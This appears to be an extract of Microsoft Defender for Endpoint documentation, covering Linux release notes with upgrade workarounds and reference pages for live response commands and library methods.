-
-The issue could be mitigated by running the following commands.
-
-```
-sudo ausearch -c 'mdatp_audisp_pl' --raw | sudo audit2allow -M my-mdatpaudisppl_v1
-sudo semodule -i my-mdatpaudisppl_v1.pp
-```
-
-Here, my-mdatpaudisppl_v1 represents the policy module name. After you run the commands, either wait for 24 hours or clear/archive the audit logs. The audit logs could be archived by running the following command
-
-```
-sudo service auditd stop
-sudo systemctl stop mdatp
-cd /var/log/audit
-sudo gzip audit.*
-sudo service auditd start
-sudo systemctl start mdatp
-mdatp health
-```
-
-In case the issue reappears with some different denials. We need to run the mitigation again with a different module name (for example, my-mdatpaudisppl_v2).
-
-</details>
-
-<details>
- <summary> March-2023 (Build: 101.98.05 | Release version: 30.123012.19805.0)</summary>
-
-## March-2023 (Build: 101.98.05 | Release version: 30.123012.19805.0)
-
-&ensp;Released: **March , 08,2023**<br/>
-&ensp;Published: **March 08, 2023**<br/>
-&ensp;Build: **101.98.05**<br/>
-&ensp;Release version: **30.123012.19805.0**<br/>
-&ensp;Engine version: **1.1.19900.2**<br/>
-&ensp;Signature version: **1.379.1299.0**<br/>
-
-**What's new**
-
-There are multiple fixes and new changes in this release.
--- Improved Data Completeness for Network Connection events-- Improved Data Collection capabilities for file ownership/permissions changes-- seManage in part of the package, to that seLinux policies can be configured in different distro (fixed).-- Improved enterprise daemon stability-- AuditD stop path clean-up-- Improved the stability of mdatp stop flow.-- Added new field to wdavstate to keep track of platform update time.-- Stability improvements to parsing Defender for Endpoint onboarding blob.-- Scan doesn't proceed if a valid license isn't present (fixed)-- Added performance tracing option to xPlatClientAnalyzer, with tracing enabled mdatp process dumps the flow in all_process.zip file that can be used for analysis of performance issues.-- Added support in Defender for Endpoint for the following RHEL-6 kernel versions:
- - `2.6.32-754.43.1.el6.x86_64`
- - `2.6.32-754.49.1.el6.x86_64`
-- Other fixes
-
-**Known issues**
--- While upgrading mdatp to version 101.94.13, you might notice that health is false, with health_issues as "no active supplementary event provider". This can happen due to misconfigured/conflicting auditd rules on existing machines. To mitigate the issue, the auditd rules on the existing machines need to be fixed. The following steps can help you to identify such auditd rules (these commands need to be run as super user). Make sure to back up following file: `/etc/audit/rules.d/audit.rules`` as these steps are only to identify failures.-
-```bash
-echo -c >> /etc/audit/rules.d/audit.rules
-augenrules --load
-```
--- While upgrading from mdatp version `101.75.43` or `101.78.13`, you might encounter a kernel hang. Run the following commands before attempting to upgrade to version `101.98.05`. For more information, see [System hang due to blocked tasks in fanotify code](https://access.redhat.com/solutions/2838901)-
-There are two ways to mitigate the problem in upgrading.
-
-Use your package manager to uninstall the `101.75.43` or `101.78.13` mdatp version.
-Example:
-```bash
-sudo apt purge mdatp
-sudo apt-get install mdatp
-```
-As an alternative, you can follow the instructions to [uninstall](/microsoft-365/security/defender-endpoint/linux-resources#uninstall), then [install](/microsoft-365/security/defender-endpoint/linux-install-manually#application-installation) the latest version of the package.
-
-In case you don't want to uninstall mdatp you can disable rtp and mdatp in sequence before upgrade.
-Caution: Some customers(<1%) are experiencing issues with this method.
-
- ```bash
-sudo mdatp config real-time-protection --value=disabled
-sudo systemctl disable mdatp
-```
-
-</details>
-
-<details>
- <summary>Jan-2023 (Build: 101.94.13 | Release version: 30.122112.19413.0)</summary>
-
-## Jan-2023 (Build: 101.94.13 | Release version: 30.122112.19413.0)
-
-&ensp;Released: **January 10, 2023**<br/>
-&ensp;Published: **January 10, 2023**<br/>
-&ensp;Build: **101.94.13**<br/>
-&ensp;Release version: **30.122112.19413.0**<br/>
-&ensp;Engine version: **1.1.19700.3**<br/>
-&ensp;Signature version: **1.377.550.0**<br/>
-
-**What's new**
--- There are multiple fixes and new changes in this release
- - Skip quarantine of threats in passive mode by default.
- - New config, nonExecMountPolicy, can now be used to specify behavior of RTP on mount point marked as noexec.
- - New config, unmonitoredFilesystems, can be used to unmonitor certain filesystems.
- - Improved performance under high load and in speed test scenarios.
- - Fixes an issue with accessing SMB shares behind Cisco AnyConnect VPN connections.
- - Fixes an issue with Network Protection and SMB.
- - lttng performance tracing support.
- - TVM, eBPF, auditd, telemetry and mdatp cli improvements.
- - mdatp health now reports behavior_monitoring
- - Other fixes.
-
-**Known issues**
--- While upgrading mdatp to version `101.94.13`, you might notice that health is false, with health_issues as "no active supplementary event provider". This can happen due to misconfigured/conflicting auditd rules on existing machines. To mitigate the issue, the auditd rules on the existing machines need to be fixed. The following steps can help you to identify such auditd rules (these commands need to be run as super user). Take a backup of following file: `/etc/audit/rules.d/audit.rules` as these steps are only to identify failures.-
-```bash
-echo -c >> /etc/audit/rules.d/audit.rules
-augenrules --load
-```
--- While upgrading from mdatp version `101.75.43` or `101.78.13`, you might encounter a kernel hang. Run the following commands before attempting to upgrade to version 101.94.13. For more information, see [System hang due to blocked tasks in fanotify code](https://access.redhat.com/solutions/2838901)-
-There are two ways to mitigate the problem in upgrading.
-
-Use your package manager to uninstall the `101.75.43` or `101.78.13` mdatp version.
-
-Example:
-
-```bash
-sudo apt purge mdatp
-sudo apt-get install mdatp
-```
-
-As an alternative to the above, you can follow the instructions to [uninstall](/microsoft-365/security/defender-endpoint/linux-resources#uninstall), then [install](/microsoft-365/security/defender-endpoint/linux-install-manually#application-installation) the latest version of the package.
-
-In case you don't want to uninstall mdatp you can disable rtp and mdatp in sequence before upgrade.
-Caution: Some customers(<1%) are experiencing issues with this method.
-
- ```bash
-sudo mdatp config real-time-protection --value=disabled
-sudo systemctl disable mdatp
-```
-
-</details>
-
-<details>
- <summary>Nov-2022 (Build: 101.85.27 | Release version: 30.122092.18527.0)</summary>
-
-## Nov-2022 (Build: 101.85.27 | Release version: 30.122092.18527.0)
-
-&ensp;Released: **November 02, 2022**<br/>
-&ensp;Published: **November 02, 2022**<br/>
-&ensp;Build: **101.85.27**<br/>
-&ensp;Release version: **30.122092.18527.0**<br/>
-&ensp;Engine version: **1.1.19500.2**<br/>
-&ensp;Signature version: **1.371.1369.0**<br/>
-
-**What's new**
--- There are multiple fixes and new changes in this release
- - V2 engine is default with this release and V1 engine bits are removed for enhanced security.
- - V2 engine support configuration path for AV definitions. (mdatp definition set path)
- - Removed external packages dependencies from MDE package. Removed dependencies are libatomic1, libselinux, libseccomp, libfuse, and libuuid
- - In case crash collection is disabled by configuration, crash monitoring process isn't launched.
- - Performance fixes to optimally use system events for AV capabilities.
- - Stability improvement when restarting mdatp and load epsext issues.
- - Other fixes
-
-**Known issues**
--- While upgrading from mdatp version `101.75.43` or `101.78.13`, you might encounter a kernel hang. Run the following commands before attempting to upgrade to version 101.85.21. For more information, see [System hang due to blocked tasks in fanotify code](https://access.redhat.com/solutions/2838901)-
-There are two ways to mitigate the problem in upgrading.
-
-Use your package manager to uninstall the `101.75.43` or `101.78.13` mdatp version.
-
-Example:
-
-```bash
-sudo apt purge mdatp
-sudo apt-get install mdatp
-```
-
-As an alternative approach, follow the instructions to [uninstall](/microsoft-365/security/defender-endpoint/linux-resources#uninstall), then [install](/microsoft-365/security/defender-endpoint/linux-install-manually#application-installation) the latest version of the package.
-
-In case you don't want to uninstall mdatp you can disable rtp and mdatp in sequence before upgrade.
-Caution: Some customers(<1%) are experiencing issues with this method.
-
- ```bash
-sudo mdatp config real-time-protection --value=disabled
-sudo systemctl disable mdatp
-```
-
-</details>
-
-<details>
- <summary>Sep-2022 (Build: 101.80.97 | Release version: 30.122072.18097.0)</summary>
-
-## Sep-2022 (Build: 101.80.97 | Release version: 30.122072.18097.0)
-
-&ensp;Released: **September 14, 2022**<br/>
-&ensp;Published: **September 14, 2022**<br/>
-&ensp;Build: **101.80.97**<br/>
-&ensp;Release version: **30.122072.18097.0**<br/>
-&ensp;Engine version: **1.1.19300.3**<br/>
-&ensp;Signature version: **1.369.395.0**<br/>
-
-**What's new**
--- Fixes a kernel hang observed on select customer workloads running mdatp version `101.75.43`. After RCA, this was attributed to a race condition while releasing the ownership of a sensor file descriptor. The race condition was exposed due to a recent product change in the shutdown path. Customers on newer Kernel versions (5.1+) aren't impacted by this issue. For more information, see [System hang due to blocked tasks in fanotify code](https://access.redhat.com/solutions/2838901).-
-**Known issues**
--- When upgrading from mdatp version `101.75.43` or `101.78.13`, you might encounter a kernel hang. Run the following commands before attempting to upgrade to version `101.80.97`. This action should prevent the issue from occurring.-
-```
-sudo mdatp config real-time-protection --value=disabled
-sudo systemctl disable mdatp
-```
-
-After executing the commands, use your package manager to perform the upgrade.
-
-As an alternative approach, follow the instructions to [uninstall](/microsoft-365/security/defender-endpoint/linux-resources#uninstall), then [install](/microsoft-365/security/defender-endpoint/linux-install-manually#application-installation) the latest version of the package.
-</br>
-
-<br/><br/>
-<br/><br/>
-<br/><br/>
-<br/><br/>
-<br/><br/>
-<br/><br/>
-</details>
-
-<details>
- <summary>Aug-2022 (Build: 101.78.13 | Release version: 30.122072.17813.0)</summary>
-
-## Aug-2022 (Build: 101.78.13 | Release version: 30.122072.17813.0)
-
- &ensp;Released: **August 24, 2022**<br/>
- &ensp;Published: **August 24, 2022**<br/>
- &ensp;Build: **101.78.13**<br/>
- &ensp;Release version: **30.122072.17813.0**<br/>
- &ensp;Engine version: **1.1.19300.3**<br/>
- &ensp;Signature version: **1.369.395.0**<br/>
-
- **What's new**
--- Rolled back due to reliability issues-
- </br>
-
- <br/><br/>
- <br/><br/>
- <br/><br/>
- <br/><br/>
- <br/><br/>
- <br/><br/>
- </details>
-
-<details>
- <summary>Aug-2022 (Build: 101.75.43 | Release version: 30.122071.17543.0)</summary>
-
-## Aug-2022 (Build: 101.75.43 | Release version: 30.122071.17543.0)
-
-&ensp;Released: **August 2, 2022**<br/>
-&ensp;Published: **August 2, 2022**<br/>
-&ensp;Build: **101.75.43**<br/>
-&ensp;Release version: **30.122071.17543.0**<br/>
-&ensp;Engine version: **1.1.19300.3**<br/>
-&ensp;Signature version: **1.369.395.0**<br/>
-
-**What's new**
--- Added support for Red Hat Enterprise Linux version 9.0-- Added a new field in the output of `mdatp health` that can be used to query the enforcement level of the network protection feature. The new field is called `network_protection_enforcement_level` and can take one of the following values: `audit`, `block`, or `disabled`.-- Addressed a product bug where multiple detections of the same content could lead to duplicate entries in the threat history-- Addressed an issue where one of the processes spawned by the product (`mdatp_audisp_plugin`) was sometimes not properly terminated when the service was stopped-- Other bug fixes
-</br>
-
-<br/><br/>
-<br/><br/>
-<br/><br/>
-<br/><br/>
-<br/><br/>
-<br/><br/>
-</details>
-
-<details>
- <summary>Jul-2022 (Build: 101.73.77 | Release version: 30.122062.17377.0)</summary>
-
-## Jul-2022 (Build: 101.73.77 | Release version: 30.122062.17377.0)
-
-&ensp;Released: **July 21, 2022**<br/>
-&ensp;Published: **July 21, 2022**<br/>
-&ensp;Build: **101.73.77**<br/>
-&ensp;Release version: **30.122062.17377.0**<br/>
-&ensp;Engine version: **1.1.19200.3**<br/>
-&ensp;Signature version: **1.367.1011.0**<br/>
-
-**What's new**
--- Added an option to [configure file hash computation](linux-preferences.md#configure-file-hash-computation-feature)-- From this build onwards, the product has the new antimalware engine by default-- Performance improvements for file copy operations-- Bug fixes
-</br>
-
-<br/><br/>
-<br/><br/>
-<br/><br/>
-<br/><br/>
-<br/><br/>
-<br/><br/>
-</details>
-
-<details>
- <summary>Jun-2022 (Build: 101.71.18 | Release version: 30.122052.17118.0)</summary>
-
-&ensp;Released: **June 24, 2022**<br/>
-&ensp;Published: **June 24, 2022**<br/>
-&ensp;Build: **101.71.18**<br/>
-&ensp;Release version: **30.122052.17118.0**<br/>
-
-**What's new**
--- Fix to support definitions storage in nonstandard locations (outside of /var) for v2 definition updates-- Fixed an issue in the product sensor used on RHEL 6 that could lead to an OS hang-- `mdatp connectivity test` was extended with an extra URL that the product requires to function correctly. The new URL is [https://go.microsoft.com/fwlink/?linkid=2144709](https://go.microsoft.com/fwlink/?linkid=2144709).-- Up until now, the product log level wasn't persisted between product restarts. Beginning with this version, there's a new command-line tool switch that persists the log level. The new command is `mdatp log level persist --level <level>`.-- Removed the dependency on `python` from the product installation package-- Performance improvements for file copy operations and processing of network events originating from `auditd`-- Bug fixes
-</br>
-
-<br/><br/>
-<br/><br/>
-<br/><br/>
-<br/><br/>
-<br/><br/>
-<br/><br/>
-</details>
-
-<details>
- <summary>May-2022 (Build: 101.68.80 | Release version: 30.122042.16880.0)</summary>
-
-## May-2022 (Build: 101.68.80 | Release version: 30.122042.16880.0)
-
-&ensp;Released: **May 23, 2022**<br/>
-&ensp;Published: **May 23, 2022**<br/>
-&ensp;Build: **101.68.80**<br/>
-&ensp;Release version: **30.122042.16880.0**<br/>
-
-**What's new**
--- Added support for kernel version `2.6.32-754.47.1.el6.x86_64` when running on RHEL 6-- On RHEL 6, product can now be installed on devices running Unbreakable Enterprise Kernel (UEK)-- Fixed an issue where the process name was sometimes incorrectly displayed as `unknown` when running `mdatp diagnostic real-time-protection-statistics`-- Fixed a bug where the product sometimes was incorrectly detecting files inside the quarantine folder-- Fixed an issue where the `mdatp` command-line tool wasn't working when `/opt` was mounted as a soft-link-- Performance improvements & bug fixes
-</br>
-
-<br/><br/>
-<br/><br/>
-<br/><br/>
-<br/><br/>
-<br/><br/>
-<br/><br/>
-</details>
-
-<details>
-<summary>May-2022 (Build: 101.65.77 | Release version: 30.122032.16577.0)</summary>
-
-## May-2022 (Build: 101.65.77 | Release version: 30.122032.16577.0)
-
-&ensp;Released: **May 2, 2022**<br/>
-&ensp;Published: **May 2, 2022**<br/>
-&ensp;Build: **101.65.77**<br/>
-&ensp;Release version: **30.122032.16577.0**<br/>
-
-**What's new**
--- Improved the `conflicting_applications` field in `mdatp health` to show only the most recent 10 processes and also to include the process names. This makes it easier to identify which processes are potentially conflicting with Microsoft Defender for Endpoint for Linux.-- Bug fixes-
-<br/><br/>
-</details><details>
-<summary>Mar-2022 (Build: 101.62.74 | Release version: 30.122022.16274.0)</summary>
-
-&ensp;Released: **Mar 24, 2022**<br/>
-&ensp;Published: **Mar 24, 2022**<br/>
-&ensp;Build: **101.62.74**<br/>
-&ensp;Release version: **30.122022.16274.0**<br/>
-
-**What's new**
--- Addressed an issue where the product would incorrectly block access to files greater than 2 GB in size when running on older kernel versions-- Bug fixes-
-<br/><br/>
-</details><details>
-<summary>Mar-2022 (Build: 101.60.93 | Release version: 30.122012.16093.0)</summary>
-
-## Mar-2022 (Build: 101.60.93 | Release version: 30.122012.16093.0)
-
-&ensp;Released: **Mar 9, 2022**<br/>
-&ensp;Published: **Mar 9, 2022**<br/>
-&ensp;Build: **101.60.93**<br/>
-&ensp;Release version: **30.122012.16093.0**<br/>
-
-**What's new**
--- This version contains a security update for [CVE-2022-23278](https://msrc-blog.microsoft.com/2022/03/08/guidance-for-cve-2022-23278-spoofing-in-microsoft-defender-for-endpoint/)-
-<br/><br/>
-</details><details>
-<summary>Mar-2022 (Build: 101.60.05 | Release version: 30.122012.16005.0)</summary>
-
-&ensp;Released: **Mar 3, 2022**<br/>
-&ensp;Published: **Mar 3, 2022**<br/>
-&ensp;Build: **101.60.05**<br/>
-&ensp;Release version: **30.122012.16005.0**<br/>
-
-**What's new**
--- Added support for kernel version 2.6.32-754.43.1.el6.x86_64 for RHEL 6.10-- Bug fixes-
-<br/><br/>
-</details><details>
-<summary>Feb-2022 (Build: 101.58.80 | Release version: 30.122012.15880.0)</summary>
-
-## Feb-2022 (Build: 101.58.80 | Release version: 30.122012.15880.0)
-
-&ensp;Released: **Feb 20, 2022**<br/>
-&ensp;Published: **Feb 20, 2022**<br/>
-&ensp;Build: **101.58.80**<br/>
-&ensp;Release version: **30.122012.15880.0**<br/>
-
-**What's new**
--- The command-line tool now supports restoring quarantined files to a location other than the one where the file was originally detected. This can be done through `mdatp threat quarantine restore --id [threat-id] --path [destination-folder]`.-- Beginning with this version, network protection for Linux can be evaluated on demand-- Bug fixes-
-<br/><br/>
-</details><details>
-<summary>Jan-2022 (Build: 101.56.62 | Release version: 30.121122.15662.0)</summary>
-
-## Jan-2022 (Build: 101.56.62 | Release version: 30.121122.15662.0)
-
-&ensp;Released: **Jan 26, 2022**<br/>
-&ensp;Published: **Jan 26, 2022**<br/>
-&ensp;Build: **101.56.62**<br/>
-&ensp;Release version: **30.121122.15662.0**<br/>
-
-**What's new**
--- Fixed a product crash introduced in 101.53.02 and that has impacted multiple customers-
-<br/><br/>
-</details><details>
-<summary>Jan-2022 (Build: 101.53.02 | Release version: (30.121112.15302.0)</summary>
-
-&ensp;Released: **Jan 8, 2022**<br/>
-&ensp;Published: **Jan 8, 2022**<br/>
-&ensp;Build: **101.53.02**<br/>
-&ensp;Release version: **30.121112.15302.0**<br/>
-
-**What's new**
--- Performance improvements & bug fixes-
-</details>
-
-<details><summary> 2021 releases</summary>
- <details><summary>(Build: 101.52.57 | Release version: 30.121092.15257.0)</summary>
-
- <p><b>
- Build: 101.52.57 <br>
- Release version: 30.121092.15257.0</b></p>
-
- <p><b> What's new </b></p>
--- Added a capability to detect vulnerable log4j jars in use by Java applications. The machine is periodically inspected for running Java processes with loaded log4j jars. The information is reported to the Microsoft Defender for Endpoint backend and is exposed in the Vulnerability Management area of the portal.-
- </details>
-
- <details><summary>(Build: 101.47.76 | Release version: 30.121092.14776.0)</summary>
-
- <p><b>
- Build: 101.47.76 <br>
- Release version: 30.121092.14776.0</b></p>
-
- <p><b>What's new</b></p>
--- Added a new switch to the command-line tool to control whether archives are scanned during on-demand scans. This can be configured through mdatp config scan-archives --value [enabled/disabled]. By default, this setting is set to enabled.-
- - Bug fixes
-
- </details>
-
- <details><summary>(Build: 101.45.13 | Release version: 30.121082.14513.0)</summary>
-
- <p>
- Build: <b>101.45.13 </b> <br>
- Release version:<b> 30.121082.14513.0 </b></p>
-
- <p><b>What's new</b></p>
--
- - Beginning with this version, we're bringing Microsoft Defender for Endpoint support to the following distros:
-
- - RHEL6.7-6.10 and CentOS6.7-6.10 versions.
- - Amazon Linux 2
- - Fedora 33 or higher
-
- - Bug fixes
-
- </details>
-
- <details><summary>(Build: 101.45.00 | Release version: 30.121072.14500.0)</summary>
-
- <p>
- Build:<b> 101.45.00</b> <br>
- Release version: <b>30.121072.14500.0</b></p>
-
- <p><b>What's new</b></p>
-
- - Added new switches to the command-line tool:
- - Control degree of parallelism for on-demand scans. This can be configured through `mdatp config maximum-on-demand-scan-threads --value [number-between-1-and-64]`. By default, a degree of parallelism of `2` is used.
- - Control whether scans after security intelligence updates are enabled or disabled. This can be configured through `mdatp config scan-after-definition-update --value [enabled/disabled]`. By default, this setting is set to `enabled`.
- - Changing the product log level now requires elevation
- - Bug fixes
-
- </details>
-
- <details><summary>(Build: 101.39.98 | Release version: 30.121062.13998.0)</summary>
-
- <p>
- Build: <b>101.39.98 </b><br>
- Release version: <b>30.121062.13998.0</b></p>
-
- <p><b>What's new</b></p>
--- Performance improvements & bug fixes-
- </details>
-
- <details><summary>(Build: 101.34.27 | Release version: 30.121052.13427.0)</summary>
-
- <p>
- Build:<b> 101.34.27</b> <br>
- Release version: <b>30.121052.13427.0</b></p>
-
- <p><b>What's new</b></p>
--- Performance improvements & bug fixes-
- </details>
-
- <details><summary>(Build: 101.29.64 | Release version: 30.121042.12964.0)</summary>
-
- <p>
- Build:<b> 101.29.64 </b><br>
- Release version:<b> 30.121042.12964.0</b></p>
-
- <p><b>What's new</b></p>
-
- - Beginning with this version, threats detected during on-demand antivirus scans triggered through the command-line client are automatically remediated. Threats detected during scans triggered through the user interface still require manual action.
- - `mdatp diagnostic real-time-protection-statistics` now supports two more switches:
- - `--sort`: sorts the output descending by total number of files scanned
- - `--top N`: displays the top N results (only works if `--sort` is also specified)
- - Performance improvements & bug fixes
-
- </details>
-
- <details><summary>(Build: 101.25.72 | Release version: 30.121022.12563.0)</summary>
-
- <p>
- Build:<b> 101.25.72</b> <br>
- Release version: <b>30.121022.12563.0</b></p>
-
- <p><b>What's new</b></p>
---- Microsoft Defender for Endpoint on Linux is now available in preview for US Government customers. For more information, see [Microsoft Defender for Endpoint for US Government customers](gov.md).
- - Fixed an issue where usage of Microsoft Defender for Endpoint on Linux on systems with FUSE filesystems was leading to OS hang
- - Performance improvements & other bug fixes
-
- </details>
-
- <details><summary>(Build: 101.25.63 | Release version: 30.121022.12563.0)</summary>
-
- <p>
- Build:<b> 101.25.63</b> <br>
- Release version: <b>30.121022.12563.0</b></p>
-
- <p><b>What's new</b></p>
---- Performance improvements & bug fixes-
- </details>
-
- <details><summary>(Build: 101.23.64 | Release version: 30.121021.12364.0)</summary>
-
- <p>
- Build:<b> 101.23.64 </b><br>
- Release version: 30.121021.12364.0</b></p>
-
- <p><b>What's new</b></p>
--- Performance improvement for the situation where an entire mount point is added to the antivirus exclusion list. Prior to this version, the product processed file activity originating from the mount point. Beginning with this version, file activity for excluded mount points is suppressed, leading to better product performance
- - Added a new option to the command-line tool to view information about the last on-demand scan. To view information about the last on-demand scan, run `mdatp health --details antivirus`
- - Other performance improvements & bug fixes
-
- </details>
-
- <details><summary>(Build: 101.18.53)</summary>
-
- <p>
- Build:<b> 101.18.53 </b><br>
-
- <p>What's new</b></p>
---- EDR for Linux is now [generally available](https://techcommunity.microsoft.com/t5/microsoft-defender-for-endpoint/edr-for-linux-is-now-is-generally-available/ba-p/2048539)
- - Added a new command-line switch (`--ignore-exclusions`) to ignore AV exclusions during custom scans (`mdatp scan custom`)
- - Extended `mdatp diagnostic create` with a new parameter (`--path [directory]`) that allows the diagnostic logs to be saved to a different directory
- - Performance improvements & bug fixes
-
- </details>
--
security Live Response Command Examples https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/live-response-command-examples.md
- Title: Live response command examples
-description: Learn to run basic or advanced live response commands for Microsoft Defender for Endpoint, and see examples on how they're used.
------- m365-security-- tier3-- mde-edr-- Previously updated : 04/03/2024--
-# Live response command examples
---
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-> Want to experience Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-investigateip-abovefoldlink)
-
-Learn about common commands used in live response and see examples on how they're typically used.
-
-Depending on the role you have, you can run basic or advanced live response commands. For more information on basic and advanced commands, see [Investigate entities on devices using live response](live-response.md).
-
-## `analyze`
-
-```console
-# Analyze the file malware.txt
-analyze file c:\Users\user\Desktop\malware.txt
-```
-
-```console
-# Analyze the process by PID
-analyze process 1234
-```
-
-## `connections`
-
-```console
-# List active connections in json format using parameter name
-connections -output json
-```
-
-```console
-# List active connections in json format without parameter name
-connections json
-```
-
-## `dir`
-
-```console
-# List files and sub-folders in the current folder (by default it will show relative paths [-relative_path])
-dir
-```
-
-```console
-# List files and sub-folders in the current folder, with their full path
-dir -full_path
-```
-
-```console
-# List files and sub-folders in a specific folder
-dir C:\Users\user\Desktop\
-```
-
-```console
-# List files and subfolders in the current folder in json format
-dir -output json
-```
-
-## `fileinfo`
-
-```console
-# Display information about a file
-fileinfo C:\Windows\notepad.exe
-```
-
-## `findfile`
-
-```console
-# Find file by name
-findfile test.txt
-```
-
-## `getfile`
-
-```console
-# Download a file from a machine
-getfile c:\Users\user\Desktop\work.txt
-```
-
-```console
-# Download a file from a machine, automatically run prerequisite commands
-getfile c:\Users\user\Desktop\work.txt -auto
-```
-
-> [!NOTE]
->
-> The following file types *cannot* be downloaded using this command from within Live Response:
->
-> - [Reparse point files](/windows-hardware/drivers/ifs/reparse-points)
-> - [Sparse files](/windows-server/administration/windows-commands/fsutil-sparse)
-> - Empty files
-> - Virtual files, or files that are not fully present locally
->
-> These file types *are* supported by [PowerShell](/powershell/scripting/overview).
->
-> Use PowerShell as an alternative, if you have problems using this command from within Live Response.
-
-## `library`
-
-```console
-# List files in the library
-library
-```
-
-```console
-# Delete a file from the library
-library delete script.ps1
-```
-
-## `processes`
-
-```console
-# Show all processes
-processes
-```
-
-```console
-# Get process by pid
-processes 123
-```
-
-```console
-# Get process by pid with argument name
-processes -pid 123
-```
-
-```console
-# Get process by name
-processes -name notepad.exe
-```
-
-## `putfile`
-
-```console
-# Upload file from library
-putfile get-process-by-name.ps1
-```
-
-```console
-# Upload file from library, overwrite file if it exists
-putfile get-process-by-name.ps1 -overwrite
-```
-
-```console
-# Upload file from library, keep it on the machine after a restart
-putfile get-process-by-name.ps1 -keep
-```
-
-## `registry`
-
-```console
-# Show information about the values in a registry key
-registry HKEY_CURRENT_USER\Console
-```
-
-```console
-# Show information about a specific registry value (the double backslash \\ indicates a registry value versus key)
-registry HKEY_CURRENT_USER\Console\\ScreenBufferSize
-```
--
-## `remediate`
-
-```console
-# Remediate file in specific path
-remediate file c:\Users\user\Desktop\malware.exe
-```
-
-```console
-# Remediate process with specific PID
-remediate process 7960
-```
-
-```console
-# See list of all remediated entities
-remediate list
-```
-
-## `run`
-
-```console
-# Run PowerShell script from the library without arguments
-run script.ps1
-```
-
-```console
-# Run PowerShell script from the library with arguments
-run get-process-by-name.ps1 -parameters "-processName Registry"
-```
-
-> [!NOTE]
->
-> For long running commands such as '**run**' or '**getfile**', you may want to use the '**&**' symbol at the end of the command to perform that action in the background.
-> This will allow you to continue investigating the machine and return to the background command when done using '**fg**' [basic command](live-response.md#basic-commands).
->
-> When passing parameters to a live response script, do not include the following forbidden characters: **';'**, **'&'**, **'|'**, **'!'**, and **'$'**.
-
-## `scheduledtask`
-
-```console
-# Get all scheduled tasks
-scheduledtasks
-```
-
-```console
-# Get specific scheduled task by location and name
-scheduledtasks Microsoft\Windows\Subscription\LicenseAcquisition
-```
-
-```console
-# Get specific scheduled task by location and name with spacing
-scheduledtasks "Microsoft\Configuration Manager\Configuration Manager Health Evaluation"
-```
-
-## `undo`
-
-```console
-# Restore remediated registry
-undo registry HKEY_CURRENT_USER\Console\ScreenBufferSize
-```
-
-```console
-# Restore remediated scheduledtask
-undo scheduledtask Microsoft\Windows\Subscription\LicenseAcquisition
-```
-
-```console
-# Restore remediated file
-undo file c:\Users\user\Desktop\malware.exe
-```
--
security Live Response Library Methods https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/live-response-library-methods.md
- Title: Live response library methods and properties
-description: Learn how to use the live response library methods and properties.
--- NOCSH------ m365-security-- tier3-- mde-edr-- Previously updated : 06/03/2021--
-# Live response library methods and properties
--
-**Applies to:** [Microsoft Defender for Endpoint](https://go.microsoft.com/fwlink/?linkid=2154037)
---- Want to experience Microsoft Defender for Endpoint? [Sign up for a free trial.](https://www.microsoft.com/microsoft-365/windows/microsoft-defender-atp?ocid=docs-wdatp-exposedapis-abovefoldlink) ----
-## Methods
-
-| **Method** | **Return Type** | **Description** |
-||-|--|
-| List library files | Library file collection | List library file entities |
-| Upload to library | Library file entity | Upload a file to live response library |
-| Delete from library | No content | Delete library file entity |
-
-## Properties
-
-| **Property** | **Type** | **Description** |
-|--|-|--|
-| Commands | Live Response command collection | Array of Command objects. See [live response commands](live-response.md#live-response-commands). |
-
security Live Response https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/live-response.md
- Title: Investigate entities on devices using live response in Microsoft Defender for Endpoint
-description: Access a device using a secure remote shell connection to do investigative work and take immediate response actions on a device in real time.
------- m365-security-- tier3-- mde-edr-- Previously updated : 04/03/2024--
-# Investigate entities on devices using live response
--
-**Applies to:**
-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-> Want to experience Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-investigateip-abovefoldlink)
-
-Live response gives security operations teams instantaneous access to a device (also referred to as a machine) using a remote shell connection. Live response gives you the power to do in-depth investigative work and take immediate response actions to promptly contain identified threats in real time.
-
-Live response is designed to enhance investigations by enabling your security operations team to collect forensic data, run scripts, send suspicious entities for analysis, remediate threats, and proactively hunt for emerging threats.
-
-> [!VIDEO https://www.microsoft.com/videoplayer/embed/RE4qLUW]
-
-With live response, analysts can do all of the following tasks:
--- Run basic and advanced commands to do investigative work on a device.-- Download files such as malware samples and outcomes of PowerShell scripts.-- Download files in the background (new!).-- Upload a PowerShell script or executable to the library and run it on a device from a tenant level.-- Take or undo remediation actions.-
-## Before you begin
-
-Before you can initiate a session on a device, make sure you fulfill the following requirements:
--- **Verify that you're running a supported version of Windows**.-
- Devices must be running one of the following versions of Windows
-
- - **Windows 10 & 11**
- - [Version 1909](/windows/whats-new/whats-new-windows-10-version-1909) or later
- - [Version 1903](/windows/whats-new/whats-new-windows-10-version-1903) with [KB4515384](https://support.microsoft.com/help/4515384/windows-10-update-kb4515384)
- - [Version 1809 (RS 5)](/windows/whats-new/whats-new-windows-10-version-1809) with [KB4537818](https://support.microsoft.com/help/4537818/windows-10-update-kb4537818)
- - [Version 1803 (RS 4)](/windows/whats-new/whats-new-windows-10-version-1803) with [KB4537795](https://support.microsoft.com/help/4537795/windows-10-update-kb4537795)
- - [Version 1709 (RS 3)](/windows/whats-new/whats-new-windows-10-version-1709) with [KB4537816](https://support.microsoft.com/help/4537816/windows-10-update-kb4537816)
-
- - **macOS** - Minimum required version: 101.43.84. Supported for Intel-based and ARM-based macOS devices.
-
- - **Linux** - Minimum required version: 101.45.13
-
- - **Windows Server 2012 R2** - with [KB5005292](https://support.microsoft.com/topic/microsoft-defender-for-endpoint-update-for-edr-sensor-f8f69773-f17f-420f-91f4-a8e5167284ac)
-
